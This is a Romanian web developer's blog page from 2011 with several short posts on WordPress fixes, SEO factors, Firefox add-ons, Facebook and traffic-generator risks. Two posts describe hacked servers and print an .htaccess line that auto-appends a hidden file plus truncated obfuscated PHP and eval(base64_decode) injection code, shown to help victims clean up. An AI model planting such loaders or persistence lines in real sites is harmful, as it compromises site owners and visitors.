WordPress 3.2.1 spart prin fisierele temei

Titlul este pompos ca in ziare si reviste. Pana la urma WordPress-ul a fost spart prin intermediul unei teme (theme, layout, sablon etc, cum ii zice fiecare). Aveam pe server mai multe teme gratuite oferite de mai multe site-uri (printre care si woothemes.com) si foloseam doar cateva dintre ele. Si prin una din ele, s-a putut intra si incarca pe server fisier cu cod PHP.

Orice programator mai rasarit – care mai face cracking, hacking – stie ca in momentul in care poti pune un fisier PHP pe un server, poti face multe pornind de acolo. Depinde ce doresti sa faci.

METODE

Am incercat sa astup groapa sapata de hacker si am folosit mai multe metode:

  • restaurarea fisierelor din back-up oferit de hosting
  • cautare de fisiere index.php si vizualizarea codului de la finalul fisierului
  • stergerea fisierelor ciudate de pe server (ex: Thumbs.db)
  • reinstalare de WordPress si alte site-uri
  • cautare de texte prin baza de date

.htacces
Blogurile dadeau un mesaj ciudat in burtiera:

PHP Warning: Unknown: failed to open stream: No such file or directory in Unknown on line 0
PHP Fatal error: Unknown: Failed opening required '/home/abcdefg/public_html/abcdefgh/Thumbs.db' (include_path='.:/usr/lib/php:/usr/local/lib/php') in Unknown on line 0

Am reinstalat, am cautat si… nimic. Pana la urma hackerul se bagase in “.htaccess” si a adaugat linia de mai jos

php_value auto_append_file /home/abcdefg/public_html/abcdefg/Thumbs.db

deci degeaba cautam in codul php, caci era folosita metoda “auto_append_file”.

Succes la cei care au gropi de astupat!

Castiga o licenta de Adobe Photoshop – pana in 14 noiembrie 2011

Site-ul appsumo.com pune la bataie 10 licente de Adobe Photoshop intr-un concurs. Trebuie doar sa va inscrieti cu adresa de e-mail.

Inscrieti-va in concurs: http://appsumo.com

Pe langa licenta, primiti si actualizari (update-uri) la licenta, pana muriti (traducere libera la englezismul “lifetime”). Succes… la concurs, binenteles.

Servere cu forumuri, wordpress-uri sparte de hackeri

In luna noiembrie 2011 am intalnit un server spart de hackeri. Pe scurt, fisierele index.php au fost editate si la final li s-a adaugat o linie lunga, ce contine urmatoarele linii (am taiat un pic din cârnații de caractere, pentru a nu pune codul în totalitate):

if (!isset($eva1fYlbakBcVSir)) {
$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZVUzElNmNTVGxEeNt1ZzkFcmJyJuUTNyZGJuciLxk2cwRCLiICKuVHdlJHJn4SNykmckRiLnsTKn4iInIiLnAkdX5Uc2dlTshEcMhHT8xFeMx2T4xjWkNTUwVGNdVzWvV1Wc9WT2wlbqZVX3lEclhTTKdWf8oEZzkVNdp2NwZGNVtVX8dmRPF3N1U2cVZDX4lVcdlWWKd2aZBnZtVFfNJ3N1U2cVZDX4lVcdl...";
$eva1tYldakBcVSir = "x73164x72162x65...";
$eva1tYldakBoVS1r = "x65143x61154x70...";
$eva1tYidokBoVSjr = "x3b51x29135x31...";
$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);
$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);
$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);
$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];
$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);
$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
$eva1tYldakBcVSir = "x73164x72x65143x72160164x72";
$eva1tYlbakBcVSir = "x67141x6f133x70170x65";
$eva1tYldakBoVS1r = "x65143x72160";
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
}
*/

Codul de mai sus nu functioneaza impreuna cu inca un fisier – numit Thumbs.db – si situat in acelasi director. Exempu de cod din acest fisier:

eval(base64_decode("aWYgKCRldmFsSnlDZUxxSXN0WG9wdWggIT0gNjQ4NzIpIHtmdW5jdGlvbiBldmFsV3FmR0RMSk...
Continue reading

200 de parametrii din algoritmul Google

Acum 11 ani scriam un articol despre optimizarea site-urilor pentru motoarele de cautare. Elementele de atunci mai sunt inca valabile si multe site-uri nu au aceste elemente de baza actualizate sau optime. De atunci pana azi, au aparut inca sute de parametrii in calculul pozitiei site-ului in paginile cu rezultate la cautari in motorul Google.

Redau o lista cu parametrii POSIBILI, folositi in calculul Google, pentru a califica un site. Sursa parametrilor este Ann Smarty http://www.searchenginejournal.com/200-parameters-in-google-algorithm/15457/

Domain: 13 factors

  1. Domain age;
  2. Length of domain registration;
  3. Domain registration information hidden/anonymous;
  4. Site top level domain (geographical focus, e.g. com versus co.uk);
  5. Site top level domain (e.g. .com versus .info);
  6. Sub domain or root domain?
  7. Domain past records (how often it changed IP);
  8. Domain past owners (how often the owner was changed)
  9. Keywords in the domain;
  10. Domain IP;
  11. Domain IP neighbors;
  12. Domain external mentions (non-linked)
  13. Geo-targeting settings in Google Webmaster Tools

Continue reading

Extensii (add-ons) pentru Firefox pentru dezvoltare web si design

Firefox a devenit un browser puternic in ultimii ani, ajungand la versiunea 4.x.  Pentru dezvoltatorii web, el oferta un mediu de navigare, dar mai ales un mediu de lucru, folosind aceste extensii (add-on-uri).  Va prezint legaturi catre cele mai bune liste cu extensii si sper sa va ajute.

Printre extensiile cele mai importante sunt: Adblock Plus, Download Statusbar, User Agent Switcher, iMacros for Firefox, Cooliris, FireShot, FireBug, Web developer, FirePHP, MesureIt, CollorZilla.

13 Firefox Add-ons For Web Development
http://blogs.sitepoint.com/13-firefox-add-ons-for-web-development/

19 Firefox Add-ons For Designers
http://blogs.sitepoint.com/firefox-add-ons-for-designers/

156 Add-ons in this Collection “Optimized firefox”
https://addons.mozilla.org/en-US/firefox/collections/davy-jones/optimizefirefox/

Succes la dezvoltare si comentariile cu legaturi la extensiile pe care le utilizate, sunt binevenite.

Utilizare de Facebook: eu laic, tu laic… ei / ele like

Este la modă să ai un cont de Facebook (www.facebook.com), să interacționezi cu “friends”-ii, să acorzi prietenii la persoane necunoscute, să fii mândru că lista de prieteni ajunge la câteva sute sau câteva mii. Îți petreci ore “pe Facebook”, chat-uind, urmărind ce mai fac “prietenii”: ce promoții și concursuri promovează, ce muzică ascultă, ce site-uri vizitează, ce fotografii văd, în ce fotografii apar și sunt tag-uiți fără acordul lor. Elemente ale vieții private sunt amestecate cu cele “de la muncă” și cele din timpul liber, creând un amalgam informațional, cu care se parfumeaza “prietenii”, vizitându-ți wall-ul sau văzându-ți “notele” în paginile lor.

Ceea ce vad este schimbarea comportamentului uman, a consumatorilor de Internet și înlocuirea interacțiunii fizice (dicuție directă, discuție telefonică), cu una artificială în lumea electronică (e-mail, chat, facebook si alte rețele de Social Media). Sunt și lucruri bune, căci lumea este informată prin acest nou canal de comunicare, dar cantitatea de timp petrecut în aceste medii (rețelele de socializare) devine mare.

Eroare facebook help

Continue reading

Buton Like de la Facebook, cu cod HTML gresit

In site-ul Facebook, in pagina de ajutor, exista instructiuni despre “Cum sa adaugi un buton Like la tine in site“. Numai ca codul HTML dat ca si exemplu de facebook.com este dat gresit: tagul iframe nu este inchis.

Cod gresit (de la Facebook):

<html>
    <head>
      <title>My Great Web page</title>
    </head>
    <body>
       <iframe src="http://www.facebook.com/plugins/like.php?href=YOUR_URL"
        scrolling="no" frameborder="0"
        style="border:none; width:450px; height:80px"><iframe>
    </body>
 </html>

Pentru exemplul dat de ei, codul HTML corect este:

<html>
    <head>
      <title>My Great Web page</title>
    </head>
    <body>
       <iframe src="http://www.facebook.com/plugins/like.php?href=YOUR_URL"
        scrolling="no" frameborder="0"
        style="border:none; width:450px; height:80px"></iframe>
    </body>
 </html>

Succes la modificat!

Blocare WordPress in “Briefly unavailable for scheduled maintenance. Check back in a minute.”

Se intampla ca WordPress-ul sa se blocheze la upgrade si sa obtineti doar mesajul “Briefly unavailable for scheduled maintenance. Check back in a minute.” in site si in admin.

Se potea rezolva problema prin stergerea fisierului “.maintenance” din radacina blogului. Intrati cu FTP sau cu alt File explorer si stergeti acest fisier. Atentie ca este ascuns si nu cu toate programelele il veti vedea. Succes

Goana SEO si cum poti sa iti frigi site-ul

Toata lumea e innebunita dupa SEO. “Vreau SEO” este pe buzele tuturor, “Vreau pe prima pagina”, “De ce nu apar o data?”.

Google este o firma privata, care te adauga dupa criterilor lor interne. La fel ca si Bing, ca si Yahoo si multe alte motoare de cautare. Doar ei cunosc formula de calcul si cum sa te pozitioneze. Cine ofera consultanta SEO, are o baza de cunostinte despre acest coeficient si poate forta repozitionarea prin aplicarea mai multor actiuni asupra site-ului.

La un client cu peste 1000 de vizitatori zilnici, am gasit multe referinte (referrer) in statistica, de la un site romanesc care genereaza trafic. Ceea ce nu stie clientul ca acest trafic este generat de roboti. Este bine ca traficul creste, fie el generat prin software manual.

Partea proasta este cand acest site generator de trafic, are virusi. Doar Google va sti daca va “parfuma” negativ site-ul clientului, daca generatorul de trafic este considerat “malware”. http://www.google.com/support/websearch/bin/answer.py?hl=en&answer=45449

La o analiza a site-ului generator de trafic, am gasit:
– foloseste “10 mii de statistici”: alexa.com, trafic.ro, statistics.ro, wta.ro, gtop.ro, extremetracking.com, google analytics
– include scripturi de la imvisible.ro, tradeads.eu si date-me.ro

Cand unele din aceste scripturi javascript sunt “hackuite”, site-ul tau va propaga hackingul, servind vizitatorului scripturi ce incerca tot felul de chestii: instalare de plug-in-uri, executie de java applet-uri, accesare de conturi paypal.com.

Firef0x-ul 3.6 a stiut sa ceara permisiuni de instalare si sa blocheze applet-urile, dar ce se face un user care si-a dat peste cap setarile de securitate? Se viruseaza si suna apoi un prieten.

exception: java.security.AccessControlException: access denied (java.util.PropertyPermision user.home read).

Succes la devirusat!